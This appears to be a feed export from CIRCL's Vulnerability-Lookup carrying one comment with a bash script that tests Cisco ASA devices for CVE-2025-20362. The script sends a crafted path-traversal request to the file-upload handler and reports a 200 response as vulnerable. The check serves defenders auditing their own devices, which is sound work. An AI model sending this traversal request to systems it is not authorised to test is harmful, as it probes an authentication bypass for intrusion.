https://cve.circl.lu/comments/feed
Most recent comments.
2025-10-20T20:47:14.141832+00:00
Vulnerability-Lookup
info@circl.lu
python-feedgen
Contains only the 10 most recent comments.
https://cve.circl.lu/comment/9b4cf20c-8f3e-4626-8fdb-9a78038a672d
Script to check for vulnerable ASAs
2025-10-20T20:47:14.148737+00:00
Paul Jung
http://cve.circl.lu/user/thanat0s
The script is available there to check if an ASA is vulnerable.
https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6
```bash
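#!/bin/bash
# CIRCL - 2025
# Test CVE 2025-20362
# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis

if [ -z "$1" ]; then
    echo "Test for CVE-2025-20362"
    echo "Usage: $0 <IP>"
    exit 1
fi

IP="$1"
echo "Looking for CVE-2025-20362"

# Build a temporary OpenSSL config (process substitution) that enables
# UnsafeLegacyRenegotiation, so OpenSSL 3 clients can still connect to
# devices that lack secure renegotiation support, then append the system config.
# --path-as-is stops curl from normalising the "/../" sequence in the URL;
# --insecure skips certificate validation; -v puts the status line in the output.
response=$(OPENSSL_CONF=<(
    echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]'
    echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n'
    cat /etc/ssl/openssl.cnf
) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \
    -S --insecure -v -o - --path-as-is 2>&1)

# The script treats a 404 as not vulnerable and a 200 as vulnerable.
if echo "$response" | grep -q "HTTP/1.1 404"; then
    echo "Not vulnerable"
elif echo "$response" | grep -q "HTTP/1.1 200"; then
    echo "Vulnerable"
else
    # Connection failure or any other status: do not report a result silently.
    echo "Inconclusive: no HTTP 200 or 404 response seen"
fi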
```
2025-10-06T16:25:58.212700+00:00